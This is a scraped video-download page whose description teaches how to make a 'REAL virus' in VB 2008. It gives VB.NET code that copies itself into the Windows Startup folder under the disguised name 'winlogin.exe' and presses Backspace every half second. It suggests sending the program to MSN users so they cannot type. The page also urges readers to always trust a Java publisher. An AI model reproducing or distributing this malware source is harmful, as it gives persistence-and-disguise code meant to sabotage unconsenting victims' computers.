Download how to make a REAL virus in VB 2008 video
Download how to make a REAL virus in VB 2008 video on savevid.com
Download how to make a REAL virus in VB 2008 streaming video in flv, mp4, avi formats direct easily on Savevid.com.
how to make a REAL virus in VB 2008
- To download Youtube videos you should click "Run" when java window opens. Enable "Always trust content from the publisher" to download seamlessly in the future.
- Download video
-
Provider:
Link:
- Rate: Please rate this video Views: 11 Downloads: 49
-
Description:
****read the description**** add &fmt=18 for high quality
this will show you how to make a very anoying self replicating program that will hit the backspace button every half a second
uses for this would be, for example, to send to msn users so they cant type
path to startup folder in vista :
"C:\Users\" & system.enviroment.username & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
path to startup folder in XP:
"C:\Documents and Settings\" & system.enviroment.username & "\Start Menu\Programs\Startup"
CODE copy it between Public class and end class
Private Sub Form1_Load_1(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
If System.IO.File.Exists("C:\users\" & System.Environment.UserName & _
"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogin.exe") = False Then
FileCopy(System.Windows.Forms.Application.ExecutablePath, "C:\users\" & System.Environment.UserName & _
"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogin.exe")
End If
Timer1.Start()
End Sub
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
SendKeys.Send("{BACKSPACE}")
End Sub - Tags:
- Category: Flag video










